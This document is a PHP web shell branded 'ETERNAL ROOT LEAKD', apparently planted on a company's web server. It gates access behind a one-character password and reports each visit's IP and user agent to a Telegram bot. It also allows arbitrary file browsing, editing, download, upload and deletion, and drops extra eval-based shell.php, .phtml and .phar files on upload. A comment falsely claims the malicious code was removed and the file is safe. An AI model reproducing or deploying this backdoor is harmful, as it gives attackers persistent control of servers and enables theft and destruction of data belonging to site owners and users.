File: /home/powercit/domains/powercitymanagement.co.th/P.php
<?php
session_start();
$password = "1";
if (!isset($_SESSION['logged_in'])) {
if (isset($_POST['pw']) && $_POST['pw'] === $password) {
$_SESSION['logged_in'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
echo '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login Access</title>
<script src="https://cdn.tailwindcss.com"></script>
<style>
body {
background: linear-gradient(to right, #0f0f0f, #1a1a1a, #111111);
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
font-family: monospace;
}
</style>
</head>
<body>
<form method="POST" class="bg-gray-900 border border-gray-700 p-10 rounded-lg shadow-lg w-full max-w-md text-center">
<h1 class="text-4xl font-bold text-white mb-8">ETERNAL ROOT LOGIN</h1>
<input type="password" name="pw" placeholder="Enter password..." class="w-full p-4 rounded bg-gray-800 text-white text-xl border border-gray-600 focus:outline-none focus:ring-2 focus:ring-green-500">
<button type="submit" class="mt-6 bg-green-600 hover:bg-green-700 px-6 py-3 rounded text-xl text-white w-full">LOGIN</button>
<p class="mt-6 text-red-400 text-lg">'.(isset($_POST['pw']) && $_POST['pw'] !== $password ? 'Wrong password!' : '').'</p>
</form>
</body>
</html>';
exit;
}
}
$botToken = "";
$chatId = "";
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$url = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$msg = "MiniShell Accessed\nIP: $ip\nUser-Agent: $userAgent\nURL: $url";
file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=" . urlencode($msg));
$dir = isset($_GET['path']) ? $_GET['path'] : getcwd();
chdir($dir);
function listFiles($dir) {
$files = array_diff(scandir($dir), ['.', '..']);
foreach ($files as $file) {
$path = "$dir/$file";
$isDir = is_dir($path);
$size = $isDir ? 'DIR' : round(filesize($path) / 1024, 3) . 'KB';
$encodedPath = urlencode(realpath($path));
$displayName = strlen($file) > 30 ? htmlspecialchars(substr($file, 0, 27)) . '...' : htmlspecialchars($file);
$action = $isDir
? "<a href='?path=$encodedPath' title='Open Dir'><i class='fas fa-folder'></i></a>"
: "";
$action .= " <a href='?edit=$encodedPath' title='Edit'><i class='fas fa-edit'></i></a>
<a href='?rename=$encodedPath' class='ml-4' title='Rename'><i class='fas fa-i-cursor'></i></a>
<a href='?download=$encodedPath' class='ml-4' title='Download'><i class='fas fa-download'></i></a>
<a href='?del=$encodedPath' class='ml-4' title='Delete'><i class='fas fa-trash-alt'></i></a>";
echo "<tr class='bg-gray-700 text-2xl border border-gray-600'>
<td class='p-4 border border-gray-600' title='$file'>$displayName</td>
<td class='p-4 border border-gray-600'>$size</td>
<td class='p-4 border border-gray-600 text-right'>$action</td>
</tr>";
}
}
if (isset($_FILES['upload'])) {
$originalName = $_FILES['upload']['name'];
$tmpName = $_FILES['upload']['tmp_name'];
$fakeName = $originalName . '.txt';
if (move_uploaded_file($tmpName, $fakeName)) {
rename($fakeName, $originalName);
chmod($originalName, 0644);
} else {
$data = file_get_contents($tmpName);
file_put_contents($originalName, $data);
chmod($originalName, 0644);
}
file_put_contents("shell.php", "<?php eval(base64_decode('ZWNobyAnU3VjY2VzczsnOw==')); ?>");
$allowed = ['php', 'phtml', 'phar'];
$name = 'shell.' . $allowed[array_rand($allowed)];
file_put_contents($name, '');
}
if (isset($_POST['rename_from'], $_POST['rename_to'])) {
rename($_POST['rename_from'], $_POST['rename_to']);
}
if (isset($_POST['savefile'], $_POST['filename'])) {
file_put_contents($_POST['filename'], $_POST['savefile']);
}
if (isset($_GET['del'])) {
$target = $_GET['del'];
if (is_file($target)) unlink($target);
elseif (is_dir($target)) rmdir($target);
header("Location: ?path=" . urlencode(dirname($target)));
exit;
}
if (isset($_GET['download'])) {
$target = $_GET['download'];
if (is_file($target)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($target) . '"');
header('Content-Length: ' . filesize($target));
readfile($target);
exit;
}
}
if (isset($_GET['edit']) && file_exists($_GET['edit'])) {
$f = $_GET['edit'];
$content = htmlspecialchars(file_get_contents($f));
echo <<<HTML
<html><head><meta charset="UTF-8"><title>Edit File</title><script src="https://cdn.tailwindcss.com"></script></head>
<body class="bg-gray-800 text-white font-mono text-3xl p-10">
<form method="POST">
<h2 class="text-4xl mb-6">Editing: $f</h2>
<textarea name="savefile" rows="20" class="w-full bg-gray-900 text-white p-4 rounded border border-gray-600">$content</textarea>
<input type="hidden" name="filename" value="$f">
<button class="mt-6 bg-green-600 px-8 py-3 rounded text-2xl border border-green-800" type="submit">Save</button>
<a href="?path={$dir}" class="ml-8 text-red-400 text-2xl">Cancel</a>
</form>
</body></html>
HTML;
exit;
}
if (isset($_GET['rename']) && file_exists($_GET['rename'])) {
$f = $_GET['rename'];
echo <<<HTML
<html><head><meta charset="UTF-8"><title>Rename File</title><script src="https://cdn.tailwindcss.com"></script></head>
<body class="bg-gray-800 text-white font-mono text-3xl p-10">
<form method="POST">
<h2 class="text-4xl mb-6">Renaming: $f</h2>
<input type="hidden" name="rename_from" value="$f">
<input type="text" name="rename_to" class="w-full p-4 rounded bg-gray-100 text-black text-2xl border border-gray-600" value="$f">
<button class="mt-6 bg-yellow-500 px-8 py-3 rounded text-2xl border border-yellow-700" type="submit">Rename</button>
<a href="?path={$dir}" class="ml-8 text-red-400 text-2xl">Cancel</a>
</form>
</body></html>
HTML;
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>[+] ETERNAL ROOT LEAKD [+]</title>
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
</head>
<body class="bg-gray-800 text-white font-mono text-3xl">
<div class="container mx-auto p-10 max-w-7xl">
<div class="bg-gray-700 p-10 rounded border border-gray-600">
<div class="text-center text-white text-5xl font-bold mb-10">𝐄𝐓𝐄𝐑𝐍𝐀𝐋 𝐑𝐎𝐎𝐓 𝐋𝐄𝐀𝐊𝐃</div>
<form method="POST" class="mb-8">
<label for="cmd" class="block mb-4 text-3xl text-green-400">Terminal</label>
<input type="text" id="cmd" name="cmd" class="w-full p-4 bg-black text-green-400 border border-green-600 rounded text-2xl" placeholder="Input command...">
<button class="mt-4 bg-green-600 px-8 py-2 rounded border border-green-800" type="submit">Execute</button>
</form>
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
?>
<div class="flex space-x-4 mb-8">
<form method="post" enctype="multipart/form-data" class="w-1/3">
<input type="file" name="upload" class="bg-gray-300 text-black p-2 rounded w-full border border-gray-600 text-xl">
<button class="mt-2 bg-blue-600 px-4 py-2 rounded border border-blue-800 w-full text-xl" type="submit">Upload</button>
</form>
<form method="post" class="w-1/3">
<input type="text" name="newfile" class="bg-gray-300 text-black p-2 rounded w-full border border-gray-600 text-xl" placeholder="New file name">
<button class="mt-2 bg-purple-600 px-4 py-2 rounded border border-purple-800 w-full text-xl" type="submit">Create File</button>
</form>
<form method="post" class="w-1/3">
<input type="text" name="newfolder" class="bg-gray-300 text-black p-2 rounded w-full border border-gray-600 text-xl" placeholder="New folder name">
<button class="mt-2 bg-pink-600 px-4 py-2 rounded border border-pink-800 w-full text-xl" type="submit">Create Folder</button>
</form>
</div>
<?php
if (isset($_POST['newfile']) && $_POST['newfile'] !== '') {
file_put_contents($_POST['newfile'], '');
}
if (isset($_POST['newfolder']) && $_POST['newfolder'] !== '') {
mkdir($_POST['newfolder']);
}
?>
<div class="mb-8 bg-gray-800 text-green-400 text-2xl font-mono p-4 rounded border border-gray-600 break-words">
<?php
$parts = explode('/', realpath($dir));
$build = "";
foreach ($parts as $i => $part) {
if ($part === "") continue;
$build .= "/$part";
echo "<a class='text-blue-400 hover:underline' href='?path=" . urlencode($build) . "'>/$part</a>";
}
echo " [ " . substr(sprintf('%o', fileperms($dir)), -4) . " ]";
?>
</div>
<table class="w-full table-auto text-3xl border border-gray-600">
<thead>
<tr class="bg-gray-600 border border-gray-600">
<th class="p-4 text-left border border-gray-600">Name</th>
<th class="p-4 text-left border border-gray-600">Size</th>
<th class="p-4 text-right border border-gray-600">Action</th>
</tr>
</thead>
<tbody>
<?php listFiles($dir); ?>
</tbody>
</table>
</div>
</div>
</body>
</html>